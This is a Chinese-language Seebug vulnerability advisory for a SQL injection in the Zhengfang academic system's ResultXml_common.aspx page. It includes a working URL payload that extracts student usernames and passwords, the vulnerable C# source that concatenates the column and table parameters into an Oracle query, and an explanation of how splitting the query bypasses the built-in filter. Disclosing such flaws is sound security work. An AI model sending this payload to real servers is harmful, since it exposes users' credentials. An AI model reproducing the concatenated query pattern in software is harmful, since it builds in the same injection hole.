正方教务系统 ResultXml_common.aspx SQL 注入漏洞

2016-01-28T00:00:00
ID SSV:90659
Type seebug
Reporter ning1022
Modified 2016-01-28T00:00:00

Description

Payload: /ResultXml_common.aspx?k=%&column='[username='||xh||']['||'passwd='||mm||']'&table=xsjbxxb+where+rownum<=10-- 漏洞页面:/ResultXml_common.aspx 漏洞源码: ``` private void Page_Load(object sender, EventArgs e)

{

    string xml = "";

    string k = "";

    k = this.Request.QueryString["k"];

    string table = this.Request.QueryString["table"];

    string column = this.Request.QueryString["column"];

    if (StringType.StrCmp(k, "", false) != 0)

    {

        xml = "<?xml version='1.0' encoding='gb2312'?>";

        xml = xml + "<data><d><![CDATA[";

        k = k.Replace("'", "''");

        string sql = "select distinct " + column + " from " + table + " where " + column + " like '" + k + "%'";

        mmtp zhj = new mmtp();

        OracleConnection conn = new OracleConnection(ConfigurationSettings.AppSettings["MyConn"] + zhj.jiemi(ConfigurationSettings.AppSettings["MyPwd"], zhj.str_jm));

        OracleCommand comm = new OracleCommand(sql, conn);

        conn.Open();

        OracleDataReader dr = comm.ExecuteReader();

        while (dr.Read())

        {

            xml = xml + "<div onclick='setContent(this.innerHTML)' onmouseover='ChangeColor(this)' onmouseout='Back(this)'>" + dr[0].ToString() + "</div>";

        }

        dr.Close();

        comm.Dispose();

        conn.Close();

        xml = xml + "]]></d></data>";

    }

    this.Response.ContentType = "text/xml";

    this.Response.ContentEncoding = Encoding.GetEncoding("gb2312");

    this.Response.Clear();

    this.Response.Write(xml);

    this.Response.End();

}

} ```

通过column参数和table参数,可以任意执行SELECT查询!,由于select语句分割在两个参数中,因此也可以绕过内置的SQL注入检测。